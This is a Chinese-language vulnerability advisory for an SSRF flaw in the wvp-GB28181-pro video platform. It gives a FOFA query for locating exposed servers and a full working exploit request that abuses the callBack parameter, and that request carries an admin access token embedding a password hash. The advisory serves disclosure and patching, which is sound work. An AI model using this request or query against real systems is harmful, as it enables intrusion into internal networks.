wvp视频平台ssrf漏洞¶
wvp视频平台ssrf漏洞,攻击者能够以受害服务器的身份,去向内部网络或其他不可达环境发送恶意请求,从而进行内网信息探测或攻击脆弱服务。
影响版本¶
wvp-GB28181-pro<=2.7.3
漏洞状态¶
| 漏洞细节 | 漏洞POC | 漏洞EXP | 在野利用 |
|---|---|---|---|
| 是 | 已公开 | 已公开 | 已知 |
风险等级¶
| 维度 | 评价 |
|---|---|
| 威胁等级 | 高危 |
| 影响面 | 广 |
| 攻击者价值 | 高 |
| 利用难度 | 低 |
漏洞复现¶
FOFA:body="国标28181"
POC/EXP:
GET /api/rtp/receive/open?callId=12345&stream=ceshi&tcpMode=0&callBack=http://10.0.4.164:7777/ HTTP/1.1
Host: 10.52.200.62:18080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Safari/537.36
Accept: application/json, text/plain, */*
access-token: eyJhbGciOiJSUzI1NiIsImtpZCI6IjNlNzk2NDZjNGRiYzQwODM4M2E5ZWVkMDlmMmI4NWFlIn0.eyJqdGkiOiJPbkFSREM4NEc2OWlxZG9rLVpjOE9BIiwiaWF0IjoxNzc5MjQ0NDY3LCJleHAiOjE3ODE4MzY0NjcsIm5iZiI6MTc3OTI0NDQ2Nywic3ViIjoibG9naW4iLCJhdWQiOiJBdWRpZW5jZSIsInVzZXJuYW1lIjoiYWRtaW4iLCJwYXNzd29yZCI6IjIxMjMyZjI5N2E1N2E1YTc0Mzg5NGEwZTRhODAxZmMzIiwicm9sZUlkIjoxfQ.RMEUIp0cpIaX3JzL61YDCUUokEz2ze_YFZqvMp5yvDq0O6Rj0ZULxMGoSu2DYjaZ1WFwX-mA22qsSs48EZ0ZdiE_3I9qRVzwRP8ofndMM4RL0c_XB2KWeAKcam-US9dOtCNfNymiDNHdZ89HAJLdKGoRx44G0pFZtmrrLVWcr2jH905Z_cyVWJY_Qjf4OGpovv3qzpv88jdtPzkTcA0siIDJENE1O352GZJV3PWS73ewXuJFv2MW4BTiVumTQM3aqRwM1KeJTseRtyE9nVTghf0ZgxrbdbG1CSGV8ELdnO9ZuDOezRvIrS8FL33IyQ6ZR8cZ0vaS56jGm2LZ-1WvkA
Referer: http://10.52.200.62:18080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9


漏洞修复¶
关闭互联网暴露面或接口设置访问权限,升级至安全版本。